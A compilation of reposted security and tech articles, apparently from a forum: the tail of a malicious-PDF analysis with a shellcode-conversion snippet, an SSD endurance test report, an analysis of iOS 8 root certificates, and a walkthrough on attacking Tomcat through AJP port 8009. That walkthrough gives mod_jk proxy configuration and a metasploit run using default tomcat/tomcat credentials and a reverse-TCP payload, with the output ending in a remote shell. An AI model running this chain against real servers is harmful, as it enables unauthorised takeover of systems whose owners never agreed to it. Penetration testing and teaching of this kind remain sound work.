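shellcode = unicode_escaped_to_bytes(r"\u9090\ueb06")
```

The resulting bytes can then be fed to shellcode2exe.py (or written straight to disk for disassembly) instead of round-tripping through the \x text form.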
This URL can be used as evidence to identify machines that have been compromised and attempted to download the malicious executable. At the time of this analysis the file was no longer there, but it's known to be a variant of the Game Over Zeus malware. The steps followed are manual, but with practice they are repeatable. They just represent a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist and much deeper analysis can be done. The focus was to demonstrate the 5 steps that can be used as a framework to discover indicators of compromise that will reveal machines compromised by the same bad guys. Using the mentioned and other tools and techniques within the 5 steps, many other questions could be answered, and we can gain a better practical understanding of how malicious documents work and which methods attackers use. Two great resources for this type of analysis are the Malware Analyst's Cookbook: Tools and Techniques for Fighting Malicious Code book by Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques course. Sursa: Malicious Documents – PDF Analysis in 5 steps | Count Upon Security
-
The SSD Endurance Experiment: Only two remain after 1.5PB Another one bites the dust by Geoff Gasior — 11:35 AM on September 19, 2014 You won't believe how much data can be written to modern SSDs. No, seriously. Our ongoing SSD Endurance Experiment has demonstrated that some consumer-grade drives can withstand over a petabyte of writes before burning out. That's a hyperbole-worthy total for a class of products typically rated to survive only a few hundred terabytes at most. Our experiment began with the Corsair Neutron GTX 240GB, Intel 335 Series 240GB, Samsung 840 Series 250GB, and Samsung 840 Pro 256GB, plus two Kingston HyperX 3K 240GB drives. They all surpassed their endurance specifications, but the 335 Series, 840 Series, and one of the HyperX drives failed to reach the petabyte mark. The remainder pressed on toward 1.5PB, and two of them made it relatively unscathed. That journey claimed one more victim, though—and you won't believe which one. Seriously, you won't. But I'll stop now. To celebrate the latest milestone, we've checked the health of the survivors, put them through another data retention test, and compiled performance results from the last 500TB. We've also taken a closer look at the last throes of our latest casualty. If you're unfamiliar with our endurance experiment, this introductory article is recommended reading. It provides far more details on our subjects, methods, and test rigs than we'll revisit today. Here are the basics: SSDs are based on NAND flash memory with limited endurance, so we're writing an unrelenting stream of data to a stack of drives to see what happens. We pause every 100TB to collect health and performance data, which we then turn into stunningly beautiful graphs. Ahem. Understanding NAND's limited lifespan requires some familiarity with how NAND works. This non-volatile memory stores data by trapping electrons inside minuscule cells built with process geometries as small as 16 nm.
The cells are walled off by an insulating oxide layer, but applying voltage causes electrons to tunnel through that barrier. Electrons are drawn into the cell when data is written and out of it when data is erased. The catch—and there always is one—is that the tunneling process erodes the insulator's ability to hold electrons within the cell. Stray electrons also get caught in the oxide layer, generating a baseline negative charge that narrows the voltage range available to represent data. The narrower that range gets, the more difficult it becomes to write reliably. Cells eventually wear to the point that they're no longer viable, after which they're retired and replaced with spare flash from the SSD's overprovisioned area. Since NAND wear is tied to the voltage range used to define data, it's highly sensitive to the bit density of the cells. Three-bit TLC NAND must differentiate between eight possible values within that limited range, while its two-bit MLC counterpart only has to contend with four values. TLC-based SSDs typically have lower endurance as a result. As we've learned in the experiment thus far, flash wear causes SSDs to perish in different ways. The Intel 335 Series is designed to check out voluntarily after a predetermined number of writes. That drive dutifully bricked itself after 750TB, even though its flash was mostly intact at the time. The first HyperX failed a little earlier, at 728TB, under much different conditions. It suffered a rash of reallocated sectors, programming failures, and erase failures before its ultimate demise. Counter-intuitively, the TLC-based Samsung 840 Series outlasted those MLC casualties to write over 900TB before failing suddenly. But its reallocated sectors started piling up after just a few hundred terabytes of writes, confirming TLC's more fragile nature. The 840 Series also suffered hundreds of uncorrectable errors split between an initial spate at 300TB and a second accumulation near the end of the road.
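The bit-density point above can be made concrete: an n-bit cell must distinguish 2^n charge states within the same voltage window, so each extra bit roughly halves the margin between adjacent states. A simplified, illustrative model (not the actual physics, which also involves read-retry and ECC):

```python
def charge_states(bits_per_cell):
    """Number of distinguishable charge levels an n-bit cell must hold."""
    return 2 ** bits_per_cell

def relative_margin(bits_per_cell):
    """Toy model: the voltage window divided by the number of gaps
    between adjacent levels; more levels means less margin per level."""
    return 1.0 / (charge_states(bits_per_cell) - 1)

mlc_states = charge_states(2)  # MLC: 4 levels
tlc_states = charge_states(3)  # TLC: 8 levels
```

This is why TLC wears out sooner: as the oxide degrades and the usable window narrows, the eight-level drive runs out of margin well before the four-level one does.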
So, what about the latest death? Much to our surprise, the Neutron GTX failed next. It had logged only three reallocated sectors through 1.1PB of writes, but SMART warnings appeared soon after, cautioning that the raw read error rate had exceeded the acceptable threshold. The drive still made it to 1.2PB and through our usual round of performance benchmarks. However, its SMART attributes showed a huge spike in reallocated sectors: Over the last 100TB, the Neutron compensated for over 3400 sector failures. And that was it. When we readied the SSDs for the next leg, our test rig refused to boot with the Neutron connected. The same thing happened with a couple of other machines, and hot-plugging the drive into a running system didn't help. Although the Neutron was detected, the Windows disk manager stalled when we tried to access it. Despite the early warnings of impending doom, the Neutron's exit didn't go entirely by the book. The drive is supposed to keep writing until its flash reserves are used up, after which it should slip into a persistent read-only state to preserve user data. As far as we can tell, our sample never made it to read-only mode. It was partitioned and loaded with 10GB of data before the power cycle that rendered the drive unresponsive, and that partition and data remain inaccessible. We've asked Corsair to clarify the Neutron GTX's sector size and how much of the overprovisioned area is available to replace retired flash. Those details should give us a better sense of whether the drive ran out of spare NAND or was struck down by something else. For what it's worth, the other SMART attributes suggest the Neutron may have had some flash in reserve. The SMART data has two values for reallocated sectors: one that counts up from zero and another that ticks down from 256. The latter still hadn't bottomed out after 1.2PB, and neither had the life-left estimate. Hmmm. 
Although the graph shows the raw read error rate plummeting toward the end, the depiction isn't entirely accurate. That attribute was already at its lowest value after 1.108PB of writes, which is when we noticed the first SMART error. We may need to grab SMART info more regularly in future endurance tests. Now that we've tended to the dead, it's time to check in on the living... Articol complet: The SSD Endurance Experiment: Only two remain after 1.5PB - The Tech Report - Page 1
-
An Analysis of the CAs trusted by iOS 8.0 Posted on September 22, 2014 by Karl Kornel iOS 8.0 ships with a number of trusted certificates (also known as "root certificates" or "certificate authorities"), which iOS implicitly trusts. The root certificates are used to trust intermediate certificates, and the intermediate certificates are used to trust web site certificates. When you go to a web site using HTTPS, or an app makes a secure connection to something on the Internet (like your mail server), the web site (or mail server, or whatever) gives iOS its certificate, and any intermediate certificates needed to make a "chain of trust" back to one of the roots. Using the fun mathematical property of transitivity, iOS will trust a web site's certificate because it trusts a root certificate. iOS 8.0 includes two hundred twenty-two trusted certificates. In this post, I'm going to take a look at these 222 certificates. First I'm going to look at them in the aggregate, giving CA counts by key size and by hashing algorithm. Afterwards, I'm going to look at who owns these trusted roots. Perl is Awesome Before I go on, a quick shout-out: Perl is awesome! I used a Perl script to parse Apple's list, and to generate the numbers below. If you want the script, here it is: The quick-and-dirty Perl script (signature) The list of CAs (signature) Key Sizes The root certificates use either RSA or ECC for their keys. Here's how the numbers break down: 4096-bit RSA: 44 CAs 2048-bit RSA: 138 CAs 1024-bit RSA: 27 CAs 384-bit ECC: 12 CAs 256-bit ECC: 1 CA On the RSA side, the numbers don't surprise me too much. 1024-bit RSA is fading away, and a fair number of CAs moved to 4096-bit RSA keys, rather than move to ECC (or before ECC started to become prevalent for certificates). Even though RSA has the supermajority, ECC has gotten a foothold in the land of the CA, and that's good, but I am concerned by the algorithm choices.
The 256-bit ECC curve that one CA is using is identified as prime256v1. The 384-bit ECC curve that twelve CAs are using is secp384r1, also known as ansip384r1, or as P-384, the bigger brother to the infamous P-256. Neither of these curves is trustworthy, according to Safecurves. I would not be surprised if the number of ECC keys stays stable, and the number of RSA 4096-bit keys goes up. Most (if not all) of the widely-supported ECC algorithms (in web browsers and servers) are of the P-XXX variety. The safer route (for now, anyway) is to move up to 4096-bit RSA, while waiting (and advocating) for the inclusion of more trusted curves into web browsers and servers. Signature Hashes When we look at the hashing algorithms used to sign these root certificates, SHA is the order of the day: SHA-512: 1 CA SHA-384: 17 CAs (including 12 of the CAs using ECC keys) SHA-256: 42 CAs (including 1 of the CAs using ECC keys) SHA-1: 149 CAs MD-5: 10 CAs MD-2: 3 CAs First, some clarification: SHA-1 is a single algorithm. SHA-2 is a collection of algorithms, among which are SHA-256, SHA-384, and SHA-512. There are also other members of SHA-2, but they aren't used here, so I'm ignoring them! Again we see the slow move away from SHA-1, and that's good, but what really surprised me was the number of MD-5 certificates, and *gasp* there are still three MD-2 CAs? Really? Looking at MD-5, both Netlock and Thawte own three each, expiring in 2019 (for Netlock) and 2020 (for Thawte). GTE owns one (expiring in 2018), Equifax owns two (expiring in 2020), and one of them (owned by Globalsign) expired this January. Those all pale in comparison to the three MD-2 CAs, all owned by Verisign (the original "Class 1,2,3 Public Primary Certification Authority" CAs) and all expiring in 2028. Hey, crypto people, if you thought MD-2 was dead, you were wrong! This inclusion really surprises me: If you try to load your own MD-5 root certificate into iOS, it will not be trusted.
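The tallying the author's Perl script performs can be sketched in Python; the records below are hypothetical stand-ins for the parsed Apple CA list, not real entries:

```python
from collections import Counter

# Hypothetical (name, signature-hash) records standing in for the parsed
# CA list; the real script parses Apple's published table.
cas = [
    ("Example Root 1", "SHA-1"),
    ("Example Root 2", "SHA-256"),
    ("Example Root 3", "SHA-1"),
    ("Example Root 4", "MD-5"),
]

# One Counter per attribute gives the per-algorithm breakdowns above.
hash_counts = Counter(alg for _, alg in cas)
```

The same one-liner over a key-size column produces the key-size breakdown from the previous section.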
And yet, iOS 8.0 ships with 13 CAs that use MD-5 (or older) algorithms. Update: As has been noted on Twitter, root certificate signatures are typically not validated by clients (browsers, OSes, etc.). Intermediates and lower certificate signatures are validated, but the root cert signatures are not. Certificate Owners Companies It is no surprise that the vast majority of CAs in iOS are owned by for-profit corporations. What interested me is just how many of those corporations seem to go a little overboard. The following vendors have more than 3 CAs in iOS 8.0: AC Camerfirma SA: 4 CAs Apple: 4 CAs Comodo: 4 CAs Digicert: 8 CAs Entrust: 5 CAs Geotrust: 4 CAs Globalsign: 6 CAs Netlock Kft: 5 CAs Symantec: 6 CAs TC Trustcenter GMBH: 6 CAs Thawte: 12 CAs The Usertrust Network: 5 CAs Verisign: 17 CAs All told, Symantec owns thirty-five CAs, thanks to Verisign’s purchase of Thawte, and Symantec’s purchase of Verisign. I don’t hold that against Symantec, though: Most of the CAs were issued before the purchase, and it’s too much trouble for all of their customers to switch over to Symantec roots. Even so, I really start to wonder: How many certificate authorities does one company actually need? Governments There are a number of governments whose CAs are included in iOS 8.0: China: 1 CA, via the China Internet Network Information Center Hong Kong: 1 CA, via the Hongkong Post e-Cert. Japan: 3 CAs, via GPKI and the Ministry of Public Management, Home Affairs, Posts, and Telecommunications (MPHPT) Netherlands: 3 CAs, via PKIoverheid Taiwan: 1 CA, via the Government Root Certification Authority Turkey: 1 CA, via the Scientific and Technological Research Council of Turkey United States: 5 CAs, via the Department of Defense Those were just the countries whose names I was able to pick out. When it comes to web sites, it looks like there’s no need to crack the encryption, and you probably don’t even need an inside line to Verisign! 
You can just issue your own faux-Microsoft cert (or faux-Google, or faux-Apple, or …) using one of your own governmental CAs, which iOS already recognizes. Unfortunately, I can not see any way (in Safari on iOS 8.0) to get information on the certificate chain for a web site. In other words, I can't tell if the certificate for secure1.store.apple.com was issued by VeriSign, or if it was issued by the US Department of Defense. Safari does show the green URL bar and company name for EV certificates, but I have no way of knowing ahead of time that Apple uses an EV certificate for their sites. Final Thoughts First of all, it's good that Apple has posted the list, and I do believe it to be a complete list. That said, I do wish there was a way in iOS Safari for me to see the details of the site's certificate, and the chain from the certificate up to the root. Maybe this is something that could be implemented as an extension? The security-conscious (or maybe security-paranoid?) will take note of the CAs that are using questionable ECC curves, and those CAs that are using MD-2 or MD-5 signature hashes. Other people will also take note of the countries whose governments have their CAs in iOS 8.0, making it so much easier for them to impersonate web sites of their choosing. There is no way to disable any of the root CAs that comes with iOS, so it is very much a take-it-or-leave-it situation. I wonder, is Android the same way, or does Android allow you to uninstall or disable CAs that you don't like? With all the work that Apple does to secure iOS devices, I trust Apple enough to take it. I'm going to continue using my iPhone 5, with iOS 8.0. Sursa: An Analysis of the CAs trusted by iOS 8.0 | Karl's Notes
-
Run Android APKs on Chrome OS, OS X, Linux and Windows. Now supports OS X, Linux and Windows See the custom ARChon runtime guide to run apps on other operating systems besides Chrome OS. Quick Demo for Chrome OS Download an official app, such as Evernote, from the Chrome Web Store. Then download this open source game: 2048.APK Game by Uberspot and load it as an unpacked extension. Press "Launch", ignore warnings. Sursa: https://github.com/vladikoff/chromeos-apk
-
8009, the forgotten Tomcat port We all know about exploiting Tomcat using WAR files. That usually involves accessing the Tomcat manager interface on the Tomcat HTTP(S) port. The fun and forgotten thing is that you can also access that manager interface on port 8009. This is the port that by default handles the AJP (Apache JServ Protocol) protocol: What is JK (or AJP)? AJP is a wire protocol. It is an optimized version of the HTTP protocol that allows a standalone web server such as Apache to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat-related content. Also interesting: The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles. It's not often that you encounter port 8009 open with ports 8080, 8180, 8443 or 80 closed, but it happens. In that case it would be nice to use existing tools like metasploit to still pwn it, right? As stated in one of the quotes, you can (ab)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that (read it first); what follows is just an overview of the commands I used on my own machine. I omitted some of the original instructions since they didn't seem to be necessary.
(apache must already be installed)

sudo apt-get install libapache2-mod-jk
sudo vim /etc/apache2/mods-available/jk.conf

# Where to find workers.properties
# Update this path to match your conf directory location
JkWorkersFile /etc/apache2/jk_workers.properties
# Where to put jk logs
# Update this path to match your logs directory location
JkLogFile /var/log/apache2/mod_jk.log
# Set the jk log level [debug/error/info]
JkLogLevel info
# Select the log format
JkLogStampFormat "[%a %b %d %H:%M:%S %Y]"
# JkOptions indicate to send SSL KEY SIZE,
JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
# JkRequestLogFormat set the request format
JkRequestLogFormat "%w %V %T"
# Shm log file
JkShmFile /var/log/apache2/jk-runtime-status

sudo ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf
sudo vim /etc/apache2/jk_workers.properties

# Define 1 real worker named ajp13
worker.list=ajp13
# Set properties for worker named ajp13 to use ajp13 protocol,
# and run on port 8009
worker.ajp13.type=ajp13
worker.ajp13.host=localhost
worker.ajp13.port=8009
worker.ajp13.lbfactor=50
worker.ajp13.cachesize=10
worker.ajp13.cache_timeout=600
worker.ajp13.socket_keepalive=1
worker.ajp13.socket_timeout=300

sudo vim /etc/apache2/sites-enabled/000-default

JkMount /* ajp13
JkMount /manager/ ajp13
JkMount /manager/* ajp13
JkMount /host-manager/ ajp13
JkMount /host-manager/* ajp13

sudo a2enmod proxy_ajp
sudo a2enmod proxy_http
sudo /etc/init.d/apache2 restart

Don't forget to adjust worker.ajp13.host to the correct host. A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven't verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system.
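Before pointing metasploit at the proxy, it can be handy to confirm that port 8009 really speaks AJP. Based on the AJPv13 documentation listed in the references, request packets carry the magic 0x12 0x34 followed by a 2-byte big-endian length, and a CPing (payload type 10) should be answered with a CPong (magic "AB", type 9). A sketch, where the helper name is my own:

```python
import socket
import struct

# AJP13 request packet: magic 0x12 0x34, 2-byte payload length, payload.
# A CPing is a one-byte payload: message type 10.
CPING = struct.pack(">HHB", 0x1234, 1, 10)
# Expected reply: container magic "AB", length 1, CPong type 9.
CPONG = b"AB" + struct.pack(">HB", 1, 9)

def ajp_ping(host, port=8009, timeout=5):
    """Return True if the service answers an AJP13 CPing with a CPong."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(CPING)
        return s.recv(len(CPONG)) == CPONG
```

If ajp_ping() returns True against the target, the mod_jk proxy setup above should work as described.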
Here is the metasploit output also:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     localhost        yes       The target address
   RPORT     80               yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.195.156  yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.195.156:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 1648 bytes as XWouWv7gyqklF.war ...
[*] Executing /XWouWv7gyqklF/TlYqV18SeuKgbYgmHxojQm2n.jsp...
[*] Sending stage (36 bytes) to 192.168.195.155
[*] Undeploying XWouWv7gyqklF ...
[*] Command shell session 1 opened (192.168.195.156:4444 -> 192.168.195.155:39401)

id
uid=115(tomcat6) gid=123(tomcat6) groups=123(tomcat6)

References
FAQ/Connectors - Tomcat Wiki
AJPv13
Rajeev Sharma: Configure mod_jk with Apache 2.2 in Ubuntu

Sursa: https://diablohorn.wordpress.com/2011/10/19/8009-the-forgotten-tomcat-port/